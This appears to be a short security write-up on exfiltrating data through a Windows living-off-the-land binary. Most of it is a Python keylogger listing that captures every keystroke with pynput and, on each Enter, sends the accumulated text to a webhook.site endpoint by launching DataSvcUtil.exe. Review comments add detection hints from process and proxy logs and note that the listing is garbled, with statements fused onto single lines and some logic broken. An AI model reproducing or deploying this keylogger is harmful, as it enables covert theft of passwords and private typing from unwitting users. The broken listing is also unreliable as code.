Data Exfiltration with LOLBins

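/uri:serviceuri — this argument is where the URL carrying the data to be exfiltrated is supplied. Because the data travels inside the URL itself, it is visible in the DataSvcUtil.exe command line and in web proxy logs.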
Event with webhook.site
# From: https://github.com/moses-palmer/pynput
# NOTE(review): this listing lost its line breaks and indentation in extraction
# (several statements are fused onto one line), so it does not parse as shown.
# The comments below describe what the visible statements do, for analysis and
# detection purposes.
from pynput.keyboard import Key, Listener
import os
import sys
# The next line fuses `import subprocess` with the assignment of URL.
# URL is a placeholder webhook.site endpoint that receives the requests.
# `os` is imported but not used anywhere in the visible code.
import subprocessURL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
# Path to DataSvcUtil.exe in the 64-bit .NET Framework v3.5 directory. The
# outbound request is made by this Microsoft binary, not by the Python process.
uploader = "C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"
# `content` accumulates the string form of every key press.
# on_press is the callback handed to the pynput Listener below.
content = ""def on_press(key):
global content
global URL
global uploader
# A backspace is recorded as a space; any other key is appended as str(key).
if str(key) == 'Key.backspace':
content += ' '
else:
content += str(key)print(f'last key: {str(key)}')
# When Enter is pressed, the accumulated keystrokes are placed in the URL query
# string and DataSvcUtil.exe is launched with that URL as an argument.
print("")if str(key) == 'Key.enter':
upload_url = (f'{URL}?{content}')
# Detection: process-creation telemetry with command-line logging (e.g. Sysmon
# Event ID 1, Windows Event 4688) shows DataSvcUtil.exe started by a Python
# interpreter with an external URL argument, and the captured text appears in
# that command line and in proxy logs for the request.
subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
# The reset below assigns to `buffer`, not `content`; `content` is never cleared
# in the visible code, so each request carries everything typed so far.
# NOTE(review): `key == 0x03` compares the pynput key object with the integer 3;
# presumably intended as a Ctrl+C check — confirm.
buffer = ''if key == 0x03:
sys.exit(0)if __name__ == "__main__":
# Registers on_press with a pynput keyboard Listener and blocks on join() until
# the listener stops; KeyboardInterrupt/SystemExit end the process with status 0.
try:
with Listener(on_press=on_press) as listener:
listener.join()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)

reverse engineering and malware tales\\ Linkedin@isdebuggerpresent\\